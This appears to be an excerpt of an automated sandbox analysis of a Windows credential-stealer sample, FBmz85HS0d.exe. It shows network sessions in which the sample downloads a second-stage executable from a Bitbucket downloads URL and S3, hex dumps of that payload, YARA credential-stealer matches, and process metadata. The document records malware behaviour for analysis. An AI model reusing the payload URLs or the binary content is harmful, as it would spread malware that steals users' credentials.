                                                                                                                                                                                        2024-12-23 08:23:49 UTC232INData Raw: 31 31 30 0d 0a 30 73 67 72 79 2b 52 4d 67 72 35 46 65 37 2b 4f 58 35 58 75 49 49 46 65 52 68 30 45 62 38 6a 61 34 51 72 6b 6b 58 46 5a 33 46 69 4a 73 77 6d 2b 78 6e 61 67 31 6a 45 50 7a 2f 31 6c 79 63 46 38 72 6a 77 76 61 57 59 61 71 37 47 45 66 73 72 2b 41 7a 36 41 64 37 2b 78 52 61 36 54 4f 2b 33 4d 4c 67 6a 50 37 7a 7a 77 33 78 4b 79 62 58 63 76 57 45 43 37 75 59 39 75 75 4c 34 56 4e 71 73 32 76 71 64 4b 72 35 63 51 72 66 67 71 43 64 4c 76 4b 2b 47 48 54 75 59 64 4c 6e 78 32 42 72 79 37 67 32 61 42 76 78 51 68 75 58 72 2b 36 6b 32 2f 78 6e 61 79 6b 6d 63 65 6e 62 52 75 36 4d 4a 62 6f 79 74 6b 4a 79 59 48 76 4b 36 52 4d 4c 69 2b 4c 58 62 74 59 4f 66 6d 47 66 72 52 59 72 4f 50 64 6c 57
                                                                                                                                                                                        Data Ascii: 1100sgry+RMgr5Fe7+OX5XuIIFeRh0Eb8ja4QrkkXFZ3FiJswm+xnag1jEPz/1lycF8rjwvaWYaq7GEfsr+Az6Ad7+xRa6TO+3MLgjP7zzw3xKybXcvWEC7uY9uuL4VNqs2vqdKr5cQrfgqCdLvK+GHTuYdLnx2Bry7g2aBvxQhuXr+6k2/xnaykmcenbRu6MJboytkJyYHvK6RMLi+LXbtYOfmGfrRYrOPdlW
                                                                                                                                                                                        2024-12-23 08:23:49 UTC47INData Raw: 4f 75 41 4f 36 67 55 62 6e 41 6d 6c 35 59 51 6e 6d 76 35 6c 76 78 72 31 54 50 36 68 36 36 50 67 48 36 59 46 75 75 49 38 34 4a 67 3d 3d 0d 0a
                                                                                                                                                                                        Data Ascii: OuAO6gUbnAml5YQnmv5lvxr1TP6h66PgH6YFuuI84Jg==
                                                                                                                                                                                        2024-12-23 08:23:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.749746185.166.143.504437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:51 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                        2024-12-23 08:23:52 UTC5933INHTTP/1.1 302 Found
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:51 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI [TRUNCATED]
                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 08:23:51 GMT
                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                        X-Served-By: 71ffdd0e333d
                                                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                                                        X-Request-Count: 319
                                                                                                                                                                                        X-Render-Time: 0.04440021514892578
                                                                                                                                                                                        X-B3-Traceid: d2dad6f796314fae90bf4b9d39ba3b8d
                                                                                                                                                                                        X-B3-Spanid: d822cd749f48d5f7
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                                                                                                        X-Usage-Quota-Remaining: 999203.784
                                                                                                                                                                                        X-Usage-Request-Cost: 809.60
                                                                                                                                                                                        X-Usage-User-Time: 0.023433
                                                                                                                                                                                        X-Usage-System-Time: 0.000855
                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                        Age: 0
                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        Atl-Traceid: d2dad6f796314fae90bf4b9d39ba3b8d
                                                                                                                                                                                        Atl-Request-Id: d2dad6f7-9631-4fae-90bf-4b9d39ba3b8d
                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                        Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        9192.168.2.7497523.5.25.824437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:54 UTC1342OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGt [TRUNCATED]
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                        2024-12-23 08:23:54 UTC574INHTTP/1.1 200 OK
                                                                                                                                                                                        x-amz-id-2: CV/H5a5FiiUx9oZ21ULV3Wsz8WKsqYSr85Rs4kvZWM26k8dgj8MiaXVmXWORUE4IemIQw7Q4youKRv2be/xQSn/vvtG8LDw2
                                                                                                                                                                                        x-amz-request-id: YVJQ5QCSMDQD5YTW
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:55 GMT
                                                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-12-23 08:23:54 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                                        2024-12-23 08:23:54 UTC450INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                                        Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                                        2024-12-23 08:23:54 UTC16384INData Raw: 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1
                                                                                                                                                                                        Data Ascii: ;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX
                                                                                                                                                                                        2024-12-23 08:23:54 UTC1024INData Raw: 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c
                                                                                                                                                                                        Data Ascii: indowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"Fil
                                                                                                                                                                                        2024-12-23 08:23:54 UTC16384INData Raw: 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53
                                                                                                                                                                                        Data Ascii: eDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)S
                                                                                                                                                                                        2024-12-23 08:23:54 UTC1024INData Raw: e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be
                                                                                                                                                                                        Data Ascii: R::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\S
                                                                                                                                                                                        2024-12-23 08:23:54 UTC1749INData Raw: d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5
                                                                                                                                                                                        Data Ascii: eBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz
                                                                                                                                                                                        2024-12-23 08:23:54 UTC9000INData Raw: d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61
                                                                                                                                                                                        Data Ascii: J7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hza
                                                                                                                                                                                        2024-12-23 08:23:54 UTC16384INData Raw: ce 07 72 4d 53 19 0b 7d 79 4e 29 f9 65 1d a4 a9 19 ef 32 ef 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27
                                                                                                                                                                                        Data Ascii: rMS}yN)e2OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'
                                                                                                                                                                                        2024-12-23 08:23:54 UTC1024INData Raw: 25 43 80 64 9e ca c4 f0 7c 08 be fb a1 50 da cb 49 ca 2f 3c 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b
                                                                                                                                                                                        Data Ascii: %Cd|PI/<yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+


                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:03:23:24
                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\FBmz85HS0d.exe"
                                                                                                                                                                                        Imagebase:0x2a0000
                                                                                                                                                                                        File size:2'931'712 bytes
                                                                                                                                                                                        MD5 hash:30669D81A7FC7B2867ECC452CE55D1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:05:12:35
                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
                                                                                                                                                                                        Imagebase:0x480000
                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Reset < >
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.1405967679.0000000001208000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1208000_FBmz85HS0d.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d80c7e49bc412e63a55bd4ae69c0b2d0bd69bf68bd9dc4b22eecded9753dfd4e
                                                                                                                                                                                          • Instruction ID: ed1f4a5ffe36d5d439045e0d4bd195781652b4006d82c88ba8aaa409b65270d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: d80c7e49bc412e63a55bd4ae69c0b2d0bd69bf68bd9dc4b22eecded9753dfd4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84E1675585E3C50FDB178B700C7A991BFB0BE2351070E86DFC9C68F8A7E229855AD362
                                                                                                                                                                                          Memory Dump Source
